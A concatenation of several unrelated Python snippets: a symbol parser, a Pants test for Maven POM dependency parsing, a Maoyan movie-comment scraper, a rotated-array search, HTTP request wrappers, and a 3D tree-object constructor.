print() # blank line, end of headers
print('Hey, this works.')
|
import sys
from .parsing_structure import parse_symbols
__all__ = [
'parse_all_symbols',
'parse_all_sections_symbols',
]
def parse_all_symbols(args):
if not args:
for x in parse_symbols(sys.stdin, 'stdin'):
yield x
else:
for filename in args:
with open(filename) as f:
for x in parse_symbols(f, filename):
yield x
def parse_all_sections_symbols(args):
sections = {}
symbols = {}
if not args:
#logger.debug('Parsing from stdin...')
for _ in parse_symbols(sys.stdin, 'stdin', sections, symbols):
pass
else:
for filename in args:
#logger.debug('Parsing %s' % filename)
with open(filename) as f:
for _ in parse_symbols(f, filename, sections, symbols):
pass
return sections, symbols
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
import pytest
from pants.backend.openapi.util_rules import pom_parser
from pants.backend.openapi.util_rules.pom_parser import AnalysePomRequest, PomReport
from pants.engine.fs import Digest, PathGlobs
from pants.jvm.resolve.common import Coordinate
from pants.testutil.rule_runner import PYTHON_BOOTSTRAP_ENV, QueryRule, RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
target_types=[], rules=[*pom_parser.rules(), QueryRule(PomReport, (AnalysePomRequest,))]
)
rule_runner.set_options(args=[], env_inherit=PYTHON_BOOTSTRAP_ENV)
return rule_runner
def test_collects_non_test_dependencies(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"pom.xml": dedent(
"""\
<project xmlns = "http://maven.apache.org/POM/4.0.0"
xmlns:xsi = "http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation = "http://maven.apache.org/POM/4.0.0
http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>com.companyname.project-group</groupId>
<artifactId>project</artifactId>
<version>1.0</version>
<properties>
<foo.version>1.0</foo.version>
</properties>
<dependencies>
<dependency>
<artifactId>foo</artifactId>
<groupId>com.example</groupId>
<version>${foo.version}</version>
</dependency>
<dependency>
<artifactId>test</artifactId>
<groupId>com.example</groupId>
<version>1.0</version>
<scope>test</scope>
</dependency>
</dependencies>
</project>
"""
)
}
)
digest = rule_runner.request(Digest, [PathGlobs(["pom.xml"])])
pom_report = rule_runner.request(PomReport, [AnalysePomRequest(digest)])
assert pom_report.dependencies == (Coordinate("com.example", "foo", "1.0"),)
|
#coding:utf-8
import requests
import json
import time
import random
import io
#下载第一页数据
def get_one_page(url):
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'
}
response = requests.get(url,headers=headers)
if response.status_code == 200:
return response.text
return None
#解析第一页数据
def parse_one_page(html):
data = json.loads(html)['cmts']
for item in data:
yield{
'comment':item['content'],
'date':item['time'].split(' ')[0],
'rate':item['score'],
'city':item['cityName'],
'nickname':item['nickName']
}
#保存数据到文本文档
def save_to_txt():
for i in range(1,101):
url = 'http://m.maoyan.com/mmdb/comments/movie/1200486.json?_v_=yes&offset=' + str(i)
html = get_one_page(url)
print('正在保存第%d页。'% i)
for item in parse_one_page(html):
with io.open('yaoshen.txt','a',encoding='utf-8') as f:
f.write(item['date'] + ',' + item['nickname'] + ',' + item['city'] + ',' +str(item['rate'])+','+item['comment']+'\n')
time.sleep(5 + float(random.randint(1, 100)) / 20)
#
def xie_zheng(infile,outfile):
infopen = open(infile,'r',encoding='utf-8')
outopen = open(outfile,'w',encoding='utf-8')
lines = infopen.readlines()
list_l = []
for line in lines:
if line not in list_l:
list_l.append(line)
outopen.write(line)
infopen.close()
outopen.close()
if __name__ == '__main__':
save_to_txt() |
def numOfRotations(arr,l,r):
if(r-l==1):
return arr[0] if arr[l]<arr[r] else arr[r]
if(r-l>1):
mid = (l+r)//2
if(arr[mid]<arr[r]):
return numOfRotations(arr,l,mid)
else:
return numOfRotations(arr,mid,r)
return arr[0]
arr = [15,2,3,6,12]
arr2 = [15,16,17]
arr1 = [15,16,17,18,19,1,2,3]
print(numOfRotations(arr,0,len(arr)-1))
print(numOfRotations(arr1,0,len(arr1)-1))
print(numOfRotations(arr2,0,len(arr2)-1)) |
import requests
import json
def get(url, headers={}, queryparams={}):
result = requests.get(url, headers=headers, params=queryparams)
return result.json()
def post(url, headers={}, data=None):
result = requests.post(url, headers=headers, data=json.dumps(data))
return result |
from Base import *
from Object import *
'''
Esta funcao cria um objeto do tipo Arvore e o retorna
@PARAMETROS
id_tex_livre - primeiro id de textura nao utilizado - passado como lista de tamanho 1
vertices_list - lista de coordenadas de vertices
textures_coord_list - lista de coordenadas de textura
normals_list - lista de normais de vertices
@RETORNO
object - o objeto Arvore criado
'''
def cria_arvore(id_tex_livre, vertices_list, textures_coord_list, normals_list):
#adicionando os nomes das texturas utilizdas em uma lista
textures_names = []
textures_names.append("Arvore/bark_0021.jpg")
textures_names.append("Arvore/DB2X2_L01.png")
filename = "Arvore/arvore.obj"
mtl_filename = "Arvore/arvore.mtl"
#criando o objeto
arvore = Object(filename, mtl_filename, textures_names, 8, 0, -8, 0, 0, 0, 3, id_tex_livre, vertices_list, textures_coord_list, normals_list)
return arvore |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.